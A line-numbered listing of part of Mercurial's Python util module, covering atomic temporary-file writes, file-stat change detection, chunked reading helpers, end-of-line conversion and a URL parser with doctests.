1915 1928 an alternative of simple "xxx.split(os.sep)".
1916 1929 It is recommended to use os.path.normpath() before using this
1917 1930 function if need.'''
1918 1931 return path.split(pycompat.ossep)
1919 1932
1920 1933 def mktempcopy(name, emptyok=False, createmode=None):
1921 1934 """Create a temporary file with the same contents from name
1922 1935
1923 1936 The permission bits are copied from the original file.
1924 1937
1925 1938 If the temporary file is going to be truncated immediately, you
1926 1939 can use emptyok=True as an optimization.
1927 1940
1928 1941 Returns the name of the temporary file.
1929 1942 """
1930 1943 d, fn = os.path.split(name)
1931 1944 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1932 1945 os.close(fd)
1933 1946 # Temporary files are created with mode 0600, which is usually not
1934 1947 # what we want. If the original file already exists, just copy
1935 1948 # its mode. Otherwise, manually obey umask.
1936 1949 copymode(name, temp, createmode)
1937 1950 if emptyok:
1938 1951 return temp
1939 1952 try:
1940 1953 try:
1941 1954 ifp = posixfile(name, "rb")
1942 1955 except IOError as inst:
1943 1956 if inst.errno == errno.ENOENT:
1944 1957 return temp
1945 1958 if not getattr(inst, 'filename', None):
1946 1959 inst.filename = name
1947 1960 raise
1948 1961 ofp = posixfile(temp, "wb")
1949 1962 for chunk in filechunkiter(ifp):
1950 1963 ofp.write(chunk)
1951 1964 ifp.close()
1952 1965 ofp.close()
1953 1966 except: # re-raises
1954 1967 try:
1955 1968 os.unlink(temp)
1956 1969 except OSError:
1957 1970 pass
1958 1971 raise
1959 1972 return temp
1960 1973
1961 1974 class filestat(object):
1962 1975 """help to exactly detect change of a file
1963 1976
1964 1977 'stat' attribute is result of 'os.stat()' if specified 'path'
1965 1978 exists. Otherwise, it is None. This can avoid preparative
1966 1979 'exists()' examination on client side of this class.
1967 1980 """
1968 1981 def __init__(self, stat):
1969 1982 self.stat = stat
1970 1983
1971 1984 @classmethod
1972 1985 def frompath(cls, path):
1973 1986 try:
1974 1987 stat = os.stat(path)
1975 1988 except OSError as err:
1976 1989 if err.errno != errno.ENOENT:
1977 1990 raise
1978 1991 stat = None
1979 1992 return cls(stat)
1980 1993
1981 1994 @classmethod
1982 1995 def fromfp(cls, fp):
1983 1996 stat = os.fstat(fp.fileno())
1984 1997 return cls(stat)
1985 1998
1986 1999 __hash__ = object.__hash__
1987 2000
1988 2001 def __eq__(self, old):
1989 2002 try:
1990 2003 # if ambiguity between stat of new and old file is
1991 2004 # avoided, comparison of size, ctime and mtime is enough
1992 2005 # to exactly detect change of a file regardless of platform
1993 2006 return (self.stat.st_size == old.stat.st_size and
1994 2007 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1995 2008 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1996 2009 except AttributeError:
1997 2010 pass
1998 2011 try:
1999 2012 return self.stat is None and old.stat is None
2000 2013 except AttributeError:
2001 2014 return False
2002 2015
2003 2016 def isambig(self, old):
2004 2017 """Examine whether new (= self) stat is ambiguous against old one
2005 2018
2006 2019 "S[N]" below means stat of a file at N-th change:
2007 2020
2008 2021 - S[n-1].ctime < S[n].ctime: can detect change of a file
2009 2022 - S[n-1].ctime == S[n].ctime
2010 2023 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2011 2024 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2012 2025 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2013 2026 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2014 2027
2015 2028 Case (*2) above means that a file was changed twice or more at
2016 2029 same time in sec (= S[n-1].ctime), and comparison of timestamp
2017 2030 is ambiguous.
2018 2031
2019 2032 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2020 2033 timestamp is ambiguous".
2021 2034
2022 2035 But advancing mtime only in case (*2) doesn't work as
2023 2036 expected, because naturally advanced S[n].mtime in case (*1)
2024 2037 might be equal to manually advanced S[n-1 or earlier].mtime.
2025 2038
2026 2039 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2027 2040 treated as ambiguous regardless of mtime, to avoid overlooking
2028 2041 by confliction between such mtime.
2029 2042
2030 2043 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2031 2044 S[n].mtime", even if size of a file isn't changed.
2032 2045 """
2033 2046 try:
2034 2047 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2035 2048 except AttributeError:
2036 2049 return False
2037 2050
2038 2051 def avoidambig(self, path, old):
2039 2052 """Change file stat of specified path to avoid ambiguity
2040 2053
2041 2054 'old' should be previous filestat of 'path'.
2042 2055
2043 2056 This skips avoiding ambiguity, if a process doesn't have
2044 2057 appropriate privileges for 'path'. This returns False in this
2045 2058 case.
2046 2059
2047 2060 Otherwise, this returns True, as "ambiguity is avoided".
2048 2061 """
2049 2062 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2050 2063 try:
2051 2064 os.utime(path, (advanced, advanced))
2052 2065 except OSError as inst:
2053 2066 if inst.errno == errno.EPERM:
2054 2067 # utime() on the file created by another user causes EPERM,
2055 2068 # if a process doesn't have appropriate privileges
2056 2069 return False
2057 2070 raise
2058 2071 return True
2059 2072
2060 2073 def __ne__(self, other):
2061 2074 return not self == other
2062 2075
2063 2076 class atomictempfile(object):
2064 2077 '''writable file object that atomically updates a file
2065 2078
2066 2079 All writes will go to a temporary copy of the original file. Call
2067 2080 close() when you are done writing, and atomictempfile will rename
2068 2081 the temporary copy to the original name, making the changes
2069 2082 visible. If the object is destroyed without being closed, all your
2070 2083 writes are discarded.
2071 2084
2072 2085 checkambig argument of constructor is used with filestat, and is
2073 2086 useful only if target file is guarded by any lock (e.g. repo.lock
2074 2087 or repo.wlock).
2075 2088 '''
2076 2089 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2077 2090 self.__name = name # permanent name
2078 2091 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2079 2092 createmode=createmode)
2080 2093 self._fp = posixfile(self._tempname, mode)
2081 2094 self._checkambig = checkambig
2082 2095
2083 2096 # delegated methods
2084 2097 self.read = self._fp.read
2085 2098 self.write = self._fp.write
2086 2099 self.seek = self._fp.seek
2087 2100 self.tell = self._fp.tell
2088 2101 self.fileno = self._fp.fileno
2089 2102
2090 2103 def close(self):
2091 2104 if not self._fp.closed:
2092 2105 self._fp.close()
2093 2106 filename = localpath(self.__name)
2094 2107 oldstat = self._checkambig and filestat.frompath(filename)
2095 2108 if oldstat and oldstat.stat:
2096 2109 rename(self._tempname, filename)
2097 2110 newstat = filestat.frompath(filename)
2098 2111 if newstat.isambig(oldstat):
2099 2112 # stat of changed file is ambiguous to original one
2100 2113 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2101 2114 os.utime(filename, (advanced, advanced))
2102 2115 else:
2103 2116 rename(self._tempname, filename)
2104 2117
2105 2118 def discard(self):
2106 2119 if not self._fp.closed:
2107 2120 try:
2108 2121 os.unlink(self._tempname)
2109 2122 except OSError:
2110 2123 pass
2111 2124 self._fp.close()
2112 2125
2113 2126 def __del__(self):
2114 2127 if safehasattr(self, '_fp'): # constructor actually did something
2115 2128 self.discard()
2116 2129
2117 2130 def __enter__(self):
2118 2131 return self
2119 2132
2120 2133 def __exit__(self, exctype, excvalue, traceback):
2121 2134 if exctype is not None:
2122 2135 self.discard()
2123 2136 else:
2124 2137 self.close()
2125 2138
2126 2139 def unlinkpath(f, ignoremissing=False, rmdir=True):
2127 2140 """unlink and remove the directory if it is empty"""
2128 2141 if ignoremissing:
2129 2142 tryunlink(f)
2130 2143 else:
2131 2144 unlink(f)
2132 2145 if rmdir:
2133 2146 # try removing directories that might now be empty
2134 2147 try:
2135 2148 removedirs(os.path.dirname(f))
2136 2149 except OSError:
2137 2150 pass
2138 2151
2139 2152 def tryunlink(f):
2140 2153 """Attempt to remove a file, ignoring ENOENT errors."""
2141 2154 try:
2142 2155 unlink(f)
2143 2156 except OSError as e:
2144 2157 if e.errno != errno.ENOENT:
2145 2158 raise
2146 2159
2147 2160 def makedirs(name, mode=None, notindexed=False):
2148 2161 """recursive directory creation with parent mode inheritance
2149 2162
2150 2163 Newly created directories are marked as "not to be indexed by
2151 2164 the content indexing service", if ``notindexed`` is specified
2152 2165 for "write" mode access.
2153 2166 """
2154 2167 try:
2155 2168 makedir(name, notindexed)
2156 2169 except OSError as err:
2157 2170 if err.errno == errno.EEXIST:
2158 2171 return
2159 2172 if err.errno != errno.ENOENT or not name:
2160 2173 raise
2161 2174 parent = os.path.dirname(os.path.abspath(name))
2162 2175 if parent == name:
2163 2176 raise
2164 2177 makedirs(parent, mode, notindexed)
2165 2178 try:
2166 2179 makedir(name, notindexed)
2167 2180 except OSError as err:
2168 2181 # Catch EEXIST to handle races
2169 2182 if err.errno == errno.EEXIST:
2170 2183 return
2171 2184 raise
2172 2185 if mode is not None:
2173 2186 os.chmod(name, mode)
2174 2187
2175 2188 def readfile(path):
2176 2189 with open(path, 'rb') as fp:
2177 2190 return fp.read()
2178 2191
2179 2192 def writefile(path, text):
2180 2193 with open(path, 'wb') as fp:
2181 2194 fp.write(text)
2182 2195
2183 2196 def appendfile(path, text):
2184 2197 with open(path, 'ab') as fp:
2185 2198 fp.write(text)
2186 2199
2187 2200 class chunkbuffer(object):
2188 2201 """Allow arbitrary sized chunks of data to be efficiently read from an
2189 2202 iterator over chunks of arbitrary size."""
2190 2203
2191 2204 def __init__(self, in_iter):
2192 2205 """in_iter is the iterator that's iterating over the input chunks."""
2193 2206 def splitbig(chunks):
2194 2207 for chunk in chunks:
2195 2208 if len(chunk) > 2**20:
2196 2209 pos = 0
2197 2210 while pos < len(chunk):
2198 2211 end = pos + 2 ** 18
2199 2212 yield chunk[pos:end]
2200 2213 pos = end
2201 2214 else:
2202 2215 yield chunk
2203 2216 self.iter = splitbig(in_iter)
2204 2217 self._queue = collections.deque()
2205 2218 self._chunkoffset = 0
2206 2219
2207 2220 def read(self, l=None):
2208 2221 """Read L bytes of data from the iterator of chunks of data.
2209 2222 Returns less than L bytes if the iterator runs dry.
2210 2223
2211 2224 If size parameter is omitted, read everything"""
2212 2225 if l is None:
2213 2226 return ''.join(self.iter)
2214 2227
2215 2228 left = l
2216 2229 buf = []
2217 2230 queue = self._queue
2218 2231 while left > 0:
2219 2232 # refill the queue
2220 2233 if not queue:
2221 2234 target = 2**18
2222 2235 for chunk in self.iter:
2223 2236 queue.append(chunk)
2224 2237 target -= len(chunk)
2225 2238 if target <= 0:
2226 2239 break
2227 2240 if not queue:
2228 2241 break
2229 2242
2230 2243 # The easy way to do this would be to queue.popleft(), modify the
2231 2244 # chunk (if necessary), then queue.appendleft(). However, for cases
2232 2245 # where we read partial chunk content, this incurs 2 dequeue
2233 2246 # mutations and creates a new str for the remaining chunk in the
2234 2247 # queue. Our code below avoids this overhead.
2235 2248
2236 2249 chunk = queue[0]
2237 2250 chunkl = len(chunk)
2238 2251 offset = self._chunkoffset
2239 2252
2240 2253 # Use full chunk.
2241 2254 if offset == 0 and left >= chunkl:
2242 2255 left -= chunkl
2243 2256 queue.popleft()
2244 2257 buf.append(chunk)
2245 2258 # self._chunkoffset remains at 0.
2246 2259 continue
2247 2260
2248 2261 chunkremaining = chunkl - offset
2249 2262
2250 2263 # Use all of unconsumed part of chunk.
2251 2264 if left >= chunkremaining:
2252 2265 left -= chunkremaining
2253 2266 queue.popleft()
2254 2267 # offset == 0 is enabled by block above, so this won't merely
2255 2268 # copy via ``chunk[0:]``.
2256 2269 buf.append(chunk[offset:])
2257 2270 self._chunkoffset = 0
2258 2271
2259 2272 # Partial chunk needed.
2260 2273 else:
2261 2274 buf.append(chunk[offset:offset + left])
2262 2275 self._chunkoffset += left
2263 2276 left -= chunkremaining
2264 2277
2265 2278 return ''.join(buf)
2266 2279
2267 2280 def filechunkiter(f, size=131072, limit=None):
2268 2281 """Create a generator that produces the data in the file size
2269 2282 (default 131072) bytes at a time, up to optional limit (default is
2270 2283 to read all data). Chunks may be less than size bytes if the
2271 2284 chunk is the last chunk in the file, or the file is a socket or
2272 2285 some other type of file that sometimes reads less data than is
2273 2286 requested."""
2274 2287 assert size >= 0
2275 2288 assert limit is None or limit >= 0
2276 2289 while True:
2277 2290 if limit is None:
2278 2291 nbytes = size
2279 2292 else:
2280 2293 nbytes = min(limit, size)
2281 2294 s = nbytes and f.read(nbytes)
2282 2295 if not s:
2283 2296 break
2284 2297 if limit:
2285 2298 limit -= len(s)
2286 2299 yield s
2287 2300
2288 2301 class cappedreader(object):
2289 2302 """A file object proxy that allows reading up to N bytes.
2290 2303
2291 2304 Given a source file object, instances of this type allow reading up to
2292 2305 N bytes from that source file object. Attempts to read past the allowed
2293 2306 limit are treated as EOF.
2294 2307
2295 2308 It is assumed that I/O is not performed on the original file object
2296 2309 in addition to I/O that is performed by this instance. If there is,
2297 2310 state tracking will get out of sync and unexpected results will ensue.
2298 2311 """
2299 2312 def __init__(self, fh, limit):
2300 2313 """Allow reading up to <limit> bytes from <fh>."""
2301 2314 self._fh = fh
2302 2315 self._left = limit
2303 2316
2304 2317 def read(self, n=-1):
2305 2318 if not self._left:
2306 2319 return b''
2307 2320
2308 2321 if n < 0:
2309 2322 n = self._left
2310 2323
2311 2324 data = self._fh.read(min(n, self._left))
2312 2325 self._left -= len(data)
2313 2326 assert self._left >= 0
2314 2327
2315 2328 return data
2316 2329
2317 2330 def readinto(self, b):
2318 2331 res = self.read(len(b))
2319 2332 if res is None:
2320 2333 return None
2321 2334
2322 2335 b[0:len(res)] = res
2323 2336 return len(res)
2324 2337
2325 2338 def unitcountfn(*unittable):
2326 2339 '''return a function that renders a readable count of some quantity'''
2327 2340
2328 2341 def go(count):
2329 2342 for multiplier, divisor, format in unittable:
2330 2343 if abs(count) >= divisor * multiplier:
2331 2344 return format % (count / float(divisor))
2332 2345 return unittable[-1][2] % count
2333 2346
2334 2347 return go
2335 2348
2336 2349 def processlinerange(fromline, toline):
2337 2350 """Check that linerange <fromline>:<toline> makes sense and return a
2338 2351 0-based range.
2339 2352
2340 2353 >>> processlinerange(10, 20)
2341 2354 (9, 20)
2342 2355 >>> processlinerange(2, 1)
2343 2356 Traceback (most recent call last):
2344 2357 ...
2345 2358 ParseError: line range must be positive
2346 2359 >>> processlinerange(0, 5)
2347 2360 Traceback (most recent call last):
2348 2361 ...
2349 2362 ParseError: fromline must be strictly positive
2350 2363 """
2351 2364 if toline - fromline < 0:
2352 2365 raise error.ParseError(_("line range must be positive"))
2353 2366 if fromline < 1:
2354 2367 raise error.ParseError(_("fromline must be strictly positive"))
2355 2368 return fromline - 1, toline
2356 2369
2357 2370 bytecount = unitcountfn(
2358 2371 (100, 1 << 30, _('%.0f GB')),
2359 2372 (10, 1 << 30, _('%.1f GB')),
2360 2373 (1, 1 << 30, _('%.2f GB')),
2361 2374 (100, 1 << 20, _('%.0f MB')),
2362 2375 (10, 1 << 20, _('%.1f MB')),
2363 2376 (1, 1 << 20, _('%.2f MB')),
2364 2377 (100, 1 << 10, _('%.0f KB')),
2365 2378 (10, 1 << 10, _('%.1f KB')),
2366 2379 (1, 1 << 10, _('%.2f KB')),
2367 2380 (1, 1, _('%.0f bytes')),
2368 2381 )
2369 2382
2370 2383 class transformingwriter(object):
2371 2384 """Writable file wrapper to transform data by function"""
2372 2385
2373 2386 def __init__(self, fp, encode):
2374 2387 self._fp = fp
2375 2388 self._encode = encode
2376 2389
2377 2390 def close(self):
2378 2391 self._fp.close()
2379 2392
2380 2393 def flush(self):
2381 2394 self._fp.flush()
2382 2395
2383 2396 def write(self, data):
2384 2397 return self._fp.write(self._encode(data))
2385 2398
2386 2399 # Matches a single EOL which can either be a CRLF where repeated CR
2387 2400 # are removed or a LF. We do not care about old Macintosh files, so a
2388 2401 # stray CR is an error.
2389 2402 _eolre = remod.compile(br'\r*\n')
2390 2403
2391 2404 def tolf(s):
2392 2405 return _eolre.sub('\n', s)
2393 2406
2394 2407 def tocrlf(s):
2395 2408 return _eolre.sub('\r\n', s)
2396 2409
2397 2410 def _crlfwriter(fp):
2398 2411 return transformingwriter(fp, tocrlf)
2399 2412
2400 2413 if pycompat.oslinesep == '\r\n':
2401 2414 tonativeeol = tocrlf
2402 2415 fromnativeeol = tolf
2403 2416 nativeeolwriter = _crlfwriter
2404 2417 else:
2405 2418 tonativeeol = pycompat.identity
2406 2419 fromnativeeol = pycompat.identity
2407 2420 nativeeolwriter = pycompat.identity
2408 2421
2409 2422 if (pyplatform.python_implementation() == 'CPython' and
2410 2423 sys.version_info < (3, 0)):
2411 2424 # There is an issue in CPython that some IO methods do not handle EINTR
2412 2425 # correctly. The following table shows what CPython version (and functions)
2413 2426 # are affected (buggy: has the EINTR bug, okay: otherwise):
2414 2427 #
2415 2428 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2416 2429 # --------------------------------------------------
2417 2430 # fp.__iter__ | buggy | buggy | okay
2418 2431 # fp.read* | buggy | okay [1] | okay
2419 2432 #
2420 2433 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2421 2434 #
2422 2435 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2423 2436 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2424 2437 #
2425 2438 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2426 2439 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2427 2440 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2428 2441 # fp.__iter__ but not other fp.read* methods.
2429 2442 #
2430 2443 # On modern systems like Linux, the "read" syscall cannot be interrupted
2431 2444 # when reading "fast" files like on-disk files. So the EINTR issue only
2432 2445 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2433 2446 # files approximately as "fast" files and use the fast (unsafe) code path,
2434 2447 # to minimize the performance impact.
2435 2448 if sys.version_info >= (2, 7, 4):
2436 2449 # fp.readline deals with EINTR correctly, use it as a workaround.
2437 2450 def _safeiterfile(fp):
2438 2451 return iter(fp.readline, '')
2439 2452 else:
2440 2453 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2441 2454 # note: this may block longer than necessary because of bufsize.
2442 2455 def _safeiterfile(fp, bufsize=4096):
2443 2456 fd = fp.fileno()
2444 2457 line = ''
2445 2458 while True:
2446 2459 try:
2447 2460 buf = os.read(fd, bufsize)
2448 2461 except OSError as ex:
2449 2462 # os.read only raises EINTR before any data is read
2450 2463 if ex.errno == errno.EINTR:
2451 2464 continue
2452 2465 else:
2453 2466 raise
2454 2467 line += buf
2455 2468 if '\n' in buf:
2456 2469 splitted = line.splitlines(True)
2457 2470 line = ''
2458 2471 for l in splitted:
2459 2472 if l[-1] == '\n':
2460 2473 yield l
2461 2474 else:
2462 2475 line = l
2463 2476 if not buf:
2464 2477 break
2465 2478 if line:
2466 2479 yield line
2467 2480
2468 2481 def iterfile(fp):
2469 2482 fastpath = True
2470 2483 if type(fp) is file:
2471 2484 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2472 2485 if fastpath:
2473 2486 return fp
2474 2487 else:
2475 2488 return _safeiterfile(fp)
2476 2489 else:
2477 2490 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2478 2491 def iterfile(fp):
2479 2492 return fp
2480 2493
2481 2494 def iterlines(iterator):
2482 2495 for chunk in iterator:
2483 2496 for line in chunk.splitlines():
2484 2497 yield line
2485 2498
2486 2499 def expandpath(path):
2487 2500 return os.path.expanduser(os.path.expandvars(path))
2488 2501
2489 2502 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2490 2503 """Return the result of interpolating items in the mapping into string s.
2491 2504
2492 2505 prefix is a single character string, or a two character string with
2493 2506 a backslash as the first character if the prefix needs to be escaped in
2494 2507 a regular expression.
2495 2508
2496 2509 fn is an optional function that will be applied to the replacement text
2497 2510 just before replacement.
2498 2511
2499 2512 escape_prefix is an optional flag that allows using doubled prefix for
2500 2513 its escaping.
2501 2514 """
2502 2515 fn = fn or (lambda s: s)
2503 2516 patterns = '|'.join(mapping.keys())
2504 2517 if escape_prefix:
2505 2518 patterns += '|' + prefix
2506 2519 if len(prefix) > 1:
2507 2520 prefix_char = prefix[1:]
2508 2521 else:
2509 2522 prefix_char = prefix
2510 2523 mapping[prefix_char] = prefix_char
2511 2524 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2512 2525 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2513 2526
2514 2527 def getport(port):
2515 2528 """Return the port for a given network service.
2516 2529
2517 2530 If port is an integer, it's returned as is. If it's a string, it's
2518 2531 looked up using socket.getservbyname(). If there's no matching
2519 2532 service, error.Abort is raised.
2520 2533 """
2521 2534 try:
2522 2535 return int(port)
2523 2536 except ValueError:
2524 2537 pass
2525 2538
2526 2539 try:
2527 2540 return socket.getservbyname(pycompat.sysstr(port))
2528 2541 except socket.error:
2529 2542 raise error.Abort(_("no port number associated with service '%s'")
2530 2543 % port)
2531 2544
2532 2545 class url(object):
2533 2546 r"""Reliable URL parser.
2534 2547
2535 2548 This parses URLs and provides attributes for the following
2536 2549 components:
2537 2550
2538 2551 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2539 2552
2540 2553 Missing components are set to None. The only exception is
2541 2554 fragment, which is set to '' if present but empty.
2542 2555
2543 2556 If parsefragment is False, fragment is included in query. If
2544 2557 parsequery is False, query is included in path. If both are
2545 2558 False, both fragment and query are included in path.
2546 2559
2547 2560 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2548 2561
2549 2562 Note that for backward compatibility reasons, bundle URLs do not
2550 2563 take host names. That means 'bundle://../' has a path of '../'.
2551 2564
2552 2565 Examples:
2553 2566
2554 2567 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2555 2568 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2556 2569 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2557 2570 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2558 2571 >>> url(b'file:///home/joe/repo')
2559 2572 <url scheme: 'file', path: '/home/joe/repo'>
2560 2573 >>> url(b'file:///c:/temp/foo/')
2561 2574 <url scheme: 'file', path: 'c:/temp/foo/'>
2562 2575 >>> url(b'bundle:foo')
2563 2576 <url scheme: 'bundle', path: 'foo'>
2564 2577 >>> url(b'bundle://../foo')
2565 2578 <url scheme: 'bundle', path: '../foo'>
2566 2579 >>> url(br'c:\foo\bar')
2567 2580 <url path: 'c:\\foo\\bar'>
2568 2581 >>> url(br'\\blah\blah\blah')
2569 2582 <url path: '\\\\blah\\blah\\blah'>
2570 2583 >>> url(br'\\blah\blah\blah#baz')
2571 2584 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2572 2585 >>> url(br'file:///C:\users\me')
2573 2586 <url scheme: 'file', path: 'C:\\users\\me'>
2574 2587
2575 2588 Authentication credentials:
2576 2589
2577 2590 >>> url(b'ssh://joe:xyz@x/repo')
2578 2591 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2579 2592 >>> url(b'ssh://joe@x/repo')
2580 2593 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2581 2594
2582 2595 Query strings and fragments:
2583 2596
2584 2597 >>> url(b'http://host/a?b#c')
2585 2598 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2586 2599 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2587 2600 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2588 2601
2589 2602 Empty path:
2590 2603
2591 2604 >>> url(b'')
2592 2605 <url path: ''>
2593 2606 >>> url(b'#a')
2594 2607 <url path: '', fragment: 'a'>
2595 2608 >>> url(b'http://host/')
2596 2609 <url scheme: 'http', host: 'host', path: ''>
2597 2610 >>> url(b'http://host/#a')
2598 2611 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2599 2612
2600 2613 Only scheme:
2601 2614
2602 2615 >>> url(b'http:')
2603 2616 <url scheme: 'http'>
2604 2617 """
2605 2618
2606 2619 _safechars = "!~*'()+"
2607 2620 _safepchars = "/!~*'()+:\\"
2608 2621 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2609 2622
2610 2623 def __init__(self, path, parsequery=True, parsefragment=True):
2611 2624 # We slowly chomp away at path until we have only the path left
2612 2625 self.scheme = self.user = self.passwd = self.host = None
2613 2626 self.port = self.path = self.query = self.fragment = None
2614 2627 self._localpath = True
2615 2628 self._hostport = ''
2616 2629 self._origpath = path
2617 2630
2618 2631 if parsefragment and '#' in path:
2619 2632 path, self.fragment = path.split('#', 1)
2620 2633
2621 2634 # special case for Windows drive letters and UNC paths
2622 2635 if hasdriveletter(path) or path.startswith('\\\\'):
2623 2636 self.path = path
2624 2637 return
2625 2638
2626 2639 # For compatibility reasons, we can't handle bundle paths as
2627 2640 # normal URLS
2628 2641 if path.startswith('bundle:'):
2629 2642 self.scheme = 'bundle'
2630 2643 path = path[7:]
2631 2644 if path.startswith('//'):
2632 2645 path = path[2:]
2633 2646 self.path = path
2634 2647 return
2635 2648
2636 2649 if self._matchscheme(path):
2637 2650 parts = path.split(':', 1)
2638 2651 if parts[0]:
2639 2652 self.scheme, path = parts
2640 2653 self._localpath = False
2641 2654
2642 2655 if not path:
2643 2656 path = None
2644 2657 if self._localpath:
2645 2658 self.path = ''
2646 2659 return
2647 2660 else:
2648 2661 if self._localpath:
2649 2662 self.path = path
2650 2663 return
2651 2664
2652 2665 if parsequery and '?' in path:
2653 2666 path, self.query = path.split('?', 1)
2654 2667 if not path:
2655 2668 path = None
2656 2669 if not self.query:
2657 2670 self.query = None
2658 2671
2659 2672 # // is required to specify a host/authority
2660 2673 if path and path.startswith('//'):
2661 2674 parts = path[2:].split('/', 1)
2662 2675 if len(parts) > 1:
2663 2676 self.host, path = parts
2664 2677 else:
2665 2678 self.host = parts[0]
2666 2679 path = None
2667 2680 if not self.host:
2668 2681 self.host = None
2669 2682 # path of file:///d is /d
2670 2683 # path of file:///d:/ is d:/, not /d:/
2671 2684 if path and not hasdriveletter(path):
2672 2685 path = '/' + path
2673 2686
2674 2687 if self.host and '@' in self.host:
2675 2688 self.user, self.host = self.host.rsplit('@', 1)
2676 2689 if ':' in self.user:
2677 2690 self.user, self.passwd = self.user.split(':', 1)
2678 2691 if not self.host:
2679 2692 self.host = None
2680 2693
2681 2694 # Don't split on colons in IPv6 addresses without ports
2682 2695 if (self.host and ':' in self.host and
2683 2696 not (self.host.startswith('[') and self.host.endswith(']'))):
2684 2697 self._hostport = self.host
2685 2698 self.host, self.port = self.host.rsplit(':', 1)
2686 2699 if not self.host:
2687 2700 self.host = None
2688 2701
2689 2702 if (self.host and self.scheme == 'file' and
2690 2703 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2691 2704 raise error.Abort(_('file:// URLs can only refer to localhost'))
2692 2705
2693 2706 self.path = path
2694 2707
2695 2708 # leave the query string escaped
2696 2709 for a in ('user', 'passwd', 'host', 'port',
2697 2710 'path', 'fragment'):
2698 2711 v = getattr(self, a)
2699 2712 if v is not None:
2700 2713 setattr(self, a, urlreq.unquote(v))
2701 2714
2702 2715 @encoding.strmethod
2703 2716 def __repr__(self):
2704 2717 attrs = []
2705 2718 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2706 2719 'query', 'fragment'):
2707 2720 v = getattr(self, a)
2708 2721 if v is not None:
2709 2722 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2710 2723 return '<url %s>' % ', '.join(attrs)
2711 2724
2712 2725 def __bytes__(self):
2713 2726 r"""Join the URL's components back into a URL string.
2714 2727
2715 2728 Examples:
2716 2729
2717 2730 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2718 2731 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2719 2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2720 2733 'http://user:pw@host:80/?foo=bar&baz=42'
2721 2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2722 2735 'http://user:pw@host:80/?foo=bar%3dbaz'
2723 2736 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2724 2737 'ssh://user:pw@[::1]:2200//home/joe#'
2725 2738 >>> bytes(url(b'http://localhost:80//'))
2726 2739 'http://localhost:80//'
2727 2740 >>> bytes(url(b'http://localhost:80/'))
2728 2741 'http://localhost:80/'
2729 2742 >>> bytes(url(b'http://localhost:80'))
2730 2743 'http://localhost:80/'
2731 2744 >>> bytes(url(b'bundle:foo'))
2732 2745 'bundle:foo'
2733 2746 >>> bytes(url(b'bundle://../foo'))
2734 2747 'bundle:../foo'
2735 2748 >>> bytes(url(b'path'))
2736 2749 'path'
2737 2750 >>> bytes(url(b'file:///tmp/foo/bar'))
2738 2751 'file:///tmp/foo/bar'
2739 2752 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2740 2753 'file:///c:/tmp/foo/bar'
2741 2754 >>> print(url(br'bundle:foo\bar'))
2742 2755 bundle:foo\bar
2743 2756 >>> print(url(br'file:///D:\data\hg'))
2744 2757 file:///D:\data\hg
2745 2758 """
2746 2759 if self._localpath:
2747 2760 s = self.path
2748 2761 if self.scheme == 'bundle':
2749 2762 s = 'bundle:' + s
2750 2763 if self.fragment:
2751 2764 s += '#' + self.fragment
2752 2765 return s
2753 2766
2754 2767 s = self.scheme + ':'
2755 2768 if self.user or self.passwd or self.host:
2756 2769 s += '//'
2757 2770 elif self.scheme and (not self.path or self.path.startswith('/')
2758 2771 or hasdriveletter(self.path)):
2759 2772 s += '//'
2760 2773 if hasdriveletter(self.path):
2761 2774 s += '/'
